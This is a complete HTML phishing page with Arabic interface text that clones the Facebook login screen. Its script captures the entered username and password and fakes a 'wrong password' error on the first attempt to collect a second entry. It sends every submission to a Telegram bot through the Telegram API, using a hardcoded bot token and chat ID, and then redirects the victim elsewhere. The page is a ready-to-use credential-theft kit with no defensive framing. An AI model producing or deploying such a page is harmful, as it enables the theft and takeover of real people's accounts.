<!DOCTYPE html>
<html lang="ar">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook Login Clone</title>
    <style>
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            font-family: Arial, sans-serif;
            background-color: #f0f2f5;
            margin: 0;
        }
        .login-container {
            width: 300px;
            padding: 20px;
            background-color: #fff;
            border-radius: 8px;
            box-shadow: 0px 4px 12px rgba(0, 0, 0, 0.15);
            text-align: center;
            margin-top: 20px;
        }
        .login-container h2 {
            color: #1877f2;
            font-size: 24px;
            margin-bottom: 10px;
        }
        .login-container p {
            font-size: 14px;
            color: #606770;
            margin-bottom: 20px;
        }
        .login-container input {
            width: 100%;
            padding: 10px;
            margin: 10px 0;
            border-radius: 5px;
            border: 1px solid #ccc;
        }
        .login-btn, .forgot-password {
            display: block;
            width: 100%;
            padding: 10px;
            background-color: #1877f2;
            color: #fff;
            border: none;
            border-radius: 5px;
            font-size: 16px;
            cursor: pointer;
            text-decoration: none;
            text-align: center;
        }
        .forgot-password {
            background-color: transparent;
            color: #1877f2;
            font-size: 14px;
            margin-top: 10px;
        }
        .footer {
            width: 100%;
            padding: 10px 0;
            background-color: #242526;
            color: #b0b3b8;
            text-align: center;
            font-size: 12px;
            position: fixed;
            bottom: 0;
            left: 0;
        }
        .footer p {
            margin: 5px 0;
        }
    </style>
</head>
<body>
    <div class="login-container">
        <h2>Facebook</h2>
        <p>للمتابعة، عليك تسجيل الدخول لفيسبوك أولاً</p>
        <input type="text" id="username" placeholder="رقم الهاتف أو البريد الإلكتروني">
        <input type="password" id="password" placeholder="كلمة المرور">
        <button class="login-btn" onclick="handleLogin()">تسجيل الدخول</button>
        <a href="#" class="forgot-password">هل نسيت كلمة المرور؟</a>
    </div>

    <div class="footer">
        <p>Facebook © 2024</p>
        <p>سياسة الخصوصية · الشروط · المساعدة</p>
    </div>

    <script>
        let attempt = 1;

        function handleLogin() {
            const username = document.getElementById("username").value;
            const password = document.getElementById("password").value;

            if (attempt === 1) {
                sendToTelegram(username, password, "كلمة المرور غير صحيحة، يرجى المحاولة مرة أخرى.");
                alert("كلمة المرور غير صحيحة. يرجى المحاولة مرة أخرى.");
                attempt++;
            } else {
                sendToTelegram(username, password, "تسجيل الدخول ناجح");
                window.location.href = "https://www.example.com"; // استبدل الرابط هنا بالرابط المطلوب
            }
        }

        function sendToTelegram(username, password, message) {
            // ضع التوكين و الاي دي الخاص بك هنا
            const botToken = "AAGsr7kOEr5BNhEEnqEpjw14HYe6OY_zQI8";
            const chatId = "7865172763";

            const telegramMessage = `${message}\nاسم المستخدم: ${username}\nكلمة المرور: ${password}`;
            const url = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(telegramMessage)}`;

            fetch(url)
                .then(response => {
                    if (response.ok) {
                        console.log("تم إرسال البيانات إلى بوت التليجرام.");
                    } else {
                        console.error("حدث خطأ في إرسال البيانات.");
                    }
                })
                .catch(error => {
                    console.error("Error:", error);
                });
        }
    </script>
</body>
</html>